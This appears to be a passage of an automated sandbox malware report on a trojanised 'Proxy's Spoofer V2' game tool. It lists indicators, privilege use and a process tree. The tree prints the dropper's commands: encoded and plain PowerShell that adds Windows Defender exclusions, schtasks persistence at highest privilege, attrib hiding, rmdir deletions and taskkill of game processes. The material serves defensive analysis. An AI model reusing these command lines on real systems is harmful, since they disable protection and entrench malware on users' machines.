5068	reg.exe
652	reg.exe
5628	reg.exe
6076	reg.exe
5252	reg.exe
5664	reg.exe
828	reg.exe
3168	reg.exe
3480	reg.exe
4676	reg.exe
5756	reg.exe
5508	reg.exe
5652	reg.exe
4136	reg.exe
4404	reg.exe
3480	reg.exe
4956	reg.exe
5844	reg.exe
3948	reg.exe
4136	reg.exe
4736	reg.exe
1060	reg.exe
3552	reg.exe
3952	reg.exe
3696	reg.exe
1976	reg.exe
1060	reg.exe
4424	reg.exe
6024	reg.exe
5544	reg.exe
4216	reg.exe
5552	reg.exe
1980	reg.exe
5548	reg.exe
4428	reg.exe
2292	reg.exe
2428	reg.exe
2964	reg.exe
4612	reg.exe
3160	reg.exe
5508	reg.exe
2388	reg.exe
1984	reg.exe
5736	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2032	schtasks.exe
2016	schtasks.exe
1548	schtasks.exe
4436	schtasks.exe
3620	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2756	Network.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3488	powershell.exe
3488	powershell.exe
8	powershell.exe
8	powershell.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
8	powershell.exe
3488	powershell.exe
3488	powershell.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
836	Network Experience.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
2964	NEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe
4228	NetworkEX.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4564	NXT Cleaner.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	836	Network Experience.exe
Token: SeDebugPrivilege	2756	Network.exe
Token: SeDebugPrivilege	4228	NetworkEX.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeBackupPrivilege	4488	vssvc.exe
Token: SeRestorePrivilege	4488	vssvc.exe
Token: SeAuditPrivilege	4488	vssvc.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	2964	NEX.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	5432	taskkill.exe
Token: SeDebugPrivilege	5672	powershell.exe
Token: SeDebugPrivilege	5880	NetworkEX.exe
Token: SeDebugPrivilege	6004	NetworkXE.exe
Token: SeDebugPrivilege	5368	powershell.exe
Token: SeDebugPrivilege	4160	powershell.exe
Token: SeDebugPrivilege	2756	Network.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeIncreaseQuotaPrivilege	5580	powershell.exe
Token: SeSecurityPrivilege	5580	powershell.exe
Token: SeTakeOwnershipPrivilege	5580	powershell.exe
Token: SeLoadDriverPrivilege	5580	powershell.exe
Token: SeSystemProfilePrivilege	5580	powershell.exe
Token: SeSystemtimePrivilege	5580	powershell.exe
Token: SeProfSingleProcessPrivilege	5580	powershell.exe
Token: SeIncBasePriorityPrivilege	5580	powershell.exe
Token: SeCreatePagefilePrivilege	5580	powershell.exe
Token: SeBackupPrivilege	5580	powershell.exe
Token: SeRestorePrivilege	5580	powershell.exe
Token: SeShutdownPrivilege	5580	powershell.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeSystemEnvironmentPrivilege	5580	powershell.exe
Token: SeRemoteShutdownPrivilege	5580	powershell.exe
Token: SeUndockPrivilege	5580	powershell.exe
Token: SeManageVolumePrivilege	5580	powershell.exe
Token: 33	5580	powershell.exe
Token: 34	5580	powershell.exe
Token: 35	5580	powershell.exe
Token: 36	5580	powershell.exe
Token: SeTakeOwnershipPrivilege	4452	Cleaner.exe
Token: SeDebugPrivilege	3696	$77NetworkEX.exe
Token: SeDebugPrivilege	4180	powershell.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	powershell.exe
Token: SeSecurityPrivilege	3480	powershell.exe
Token: SeTakeOwnershipPrivilege	3480	powershell.exe
Token: SeLoadDriverPrivilege	3480	powershell.exe
Token: SeSystemProfilePrivilege	3480	powershell.exe
Token: SeSystemtimePrivilege	3480	powershell.exe
Token: SeProfSingleProcessPrivilege	3480	powershell.exe
Token: SeIncBasePriorityPrivilege	3480	powershell.exe
Token: SeCreatePagefilePrivilege	3480	powershell.exe
Token: SeBackupPrivilege	3480	powershell.exe
Token: SeRestorePrivilege	3480	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe
3476	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
6004	NetworkXE.exe
5880	NetworkEX.exe
2756	Network.exe
3696	$77NetworkEX.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3176 wrote to memory of 3488	3176	Proxy's Spoofer V2.exe	84
PID 3176 wrote to memory of 3488	3176	Proxy's Spoofer V2.exe	84
PID 3176 wrote to memory of 3488	3176	Proxy's Spoofer V2.exe	84
PID 3176 wrote to memory of 4184	3176	Proxy's Spoofer V2.exe	86
PID 3176 wrote to memory of 4184	3176	Proxy's Spoofer V2.exe	86
PID 3176 wrote to memory of 4184	3176	Proxy's Spoofer V2.exe	86
PID 3176 wrote to memory of 4564	3176	Proxy's Spoofer V2.exe	88
PID 3176 wrote to memory of 4564	3176	Proxy's Spoofer V2.exe	88
PID 3176 wrote to memory of 876	3176	Proxy's Spoofer V2.exe	90
PID 3176 wrote to memory of 876	3176	Proxy's Spoofer V2.exe	90
PID 4184 wrote to memory of 8	4184	NetworkEX.exe	91
PID 4184 wrote to memory of 8	4184	NetworkEX.exe	91
PID 4184 wrote to memory of 8	4184	NetworkEX.exe	91
PID 3176 wrote to memory of 3512	3176	Proxy's Spoofer V2.exe	94
PID 3176 wrote to memory of 3512	3176	Proxy's Spoofer V2.exe	94
PID 4184 wrote to memory of 836	4184	NetworkEX.exe	96
PID 4184 wrote to memory of 836	4184	NetworkEX.exe	96
PID 4184 wrote to memory of 2756	4184	NetworkEX.exe	97
PID 4184 wrote to memory of 2756	4184	NetworkEX.exe	97
PID 4184 wrote to memory of 4228	4184	NetworkEX.exe	98
PID 4184 wrote to memory of 4228	4184	NetworkEX.exe	98
PID 4184 wrote to memory of 2964	4184	NetworkEX.exe	99
PID 4184 wrote to memory of 2964	4184	NetworkEX.exe	99
PID 3176 wrote to memory of 4420	3176	Proxy's Spoofer V2.exe	100
PID 3176 wrote to memory of 4420	3176	Proxy's Spoofer V2.exe	100
PID 876 wrote to memory of 5044	876	nExOs.exe	102
PID 876 wrote to memory of 5044	876	nExOs.exe	102
PID 4564 wrote to memory of 3820	4564	NXT Cleaner.exe	106
PID 4564 wrote to memory of 3820	4564	NXT Cleaner.exe	106
PID 5044 wrote to memory of 636	5044	cmd.exe	107
PID 5044 wrote to memory of 636	5044	cmd.exe	107
PID 4420 wrote to memory of 2764	4420	AccuracyFN Swoofer.exe	135
PID 4420 wrote to memory of 2764	4420	AccuracyFN Swoofer.exe	135
PID 4420 wrote to memory of 4304	4420	AccuracyFN Swoofer.exe	150
PID 4420 wrote to memory of 4304	4420	AccuracyFN Swoofer.exe	150
PID 4420 wrote to memory of 3908	4420	AccuracyFN Swoofer.exe	114
PID 4420 wrote to memory of 3908	4420	AccuracyFN Swoofer.exe	114
PID 4420 wrote to memory of 2712	4420	AccuracyFN Swoofer.exe	116
PID 4420 wrote to memory of 2712	4420	AccuracyFN Swoofer.exe	116
PID 4420 wrote to memory of 4012	4420	AccuracyFN Swoofer.exe	118
PID 4420 wrote to memory of 4012	4420	AccuracyFN Swoofer.exe	118
PID 4420 wrote to memory of 3392	4420	AccuracyFN Swoofer.exe	157
PID 4420 wrote to memory of 3392	4420	AccuracyFN Swoofer.exe	157
PID 4420 wrote to memory of 4912	4420	AccuracyFN Swoofer.exe	122
PID 4420 wrote to memory of 4912	4420	AccuracyFN Swoofer.exe	122
PID 2764 wrote to memory of 3676	2764	cmd.exe	123
PID 2764 wrote to memory of 3676	2764	cmd.exe	123
PID 4304 wrote to memory of 1552	4304	cmd.exe	124
PID 4304 wrote to memory of 1552	4304	cmd.exe	124
PID 4012 wrote to memory of 3732	4012	cmd.exe	125
PID 4012 wrote to memory of 3732	4012	cmd.exe	125
PID 4564 wrote to memory of 1968	4564	NXT Cleaner.exe	352
PID 4564 wrote to memory of 1968	4564	NXT Cleaner.exe	352
PID 876 wrote to memory of 1160	876	nExOs.exe	128
PID 876 wrote to memory of 1160	876	nExOs.exe	128
PID 4420 wrote to memory of 1140	4420	AccuracyFN Swoofer.exe	129
PID 4420 wrote to memory of 1140	4420	AccuracyFN Swoofer.exe	129
PID 1160 wrote to memory of 4884	1160	cmd.exe	130
PID 1160 wrote to memory of 4884	1160	cmd.exe	130
PID 3908 wrote to memory of 1448	3908	cmd.exe	131
PID 3908 wrote to memory of 1448	3908	cmd.exe	131
PID 2712 wrote to memory of 4160	2712	cmd.exe	401
PID 2712 wrote to memory of 4160	2712	cmd.exe	401
PID 836 wrote to memory of 276	836	Network Experience.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4344	attrib.exe
2832	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Proxy's Spoofer V2.exe
"C:\Users\Admin\AppData\Local\Temp\Proxy's Spoofer V2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\NetworkEX.exe
  "C:\Windows\NetworkEX.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABoACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- - C:\Users\Admin\AppData\Roaming\Network Experience.exe
    "C:\Users\Admin\AppData\Roaming\Network Experience.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"' & exit
      4⤵
      PID:276
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp734B.tmp.bat""
      4⤵
      PID:2872
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2764
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2020
    - - C:\Users\Admin\AppData\Roaming\NetworkEX.exe
        
        "C:\Users\Admin\AppData\Roaming\NetworkEX.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5880
- - C:\Windows\Network.exe
    "C:\Windows\Network.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4160
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NetworkEXP" /tr "C:\Users\Admin\AppData\Roaming\NetworkEXP.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4436
- - C:\Users\Admin\NetworkEX.exe
    "C:\Users\Admin\NetworkEX.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4228
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"' & exit
      4⤵
      PID:4848
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp78E9.tmp.bat""
      4⤵
      PID:3696
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2700
    - - C:\Users\Admin\AppData\Roaming\NetworkXE.exe
        
        "C:\Users\Admin\AppData\Roaming\NetworkXE.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:6004
- - C:\Users\Admin\AppData\Local\NEX.exe
    "C:\Users\Admin\AppData\Local\NEX.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2832
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4344
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC796.tmp.bat""
      4⤵
      PID:5256
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6064
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:296
    - - C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3696
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77NetworkEX.exe
        6⤵
        
        PID:5836
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5280
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77NetworkEX.exe" /TR "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe \"\$77NetworkEX.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3620
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77NetworkEX.exe
        6⤵
        
        PID:5484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4180
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "NetworkEX_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2032
- C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:3820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2604
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    - Drops file in Windows directory
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start https://nxt.lol/
    3⤵
    PID:2972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://nxt.lol/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff2c246f8,0x7ffff2c24708,0x7ffff2c24718
        5⤵
        
        PID:4328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:1480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
        5⤵
        
        PID:460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
        5⤵
        
        PID:4572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
        5⤵
        
        PID:3924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:3156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
        5⤵
        
        PID:5704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
        5⤵
        
        PID:5984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
        5⤵
        
        PID:324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15072337366622503989,18163961253783755683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
        5⤵
        
        PID:5640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3016
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
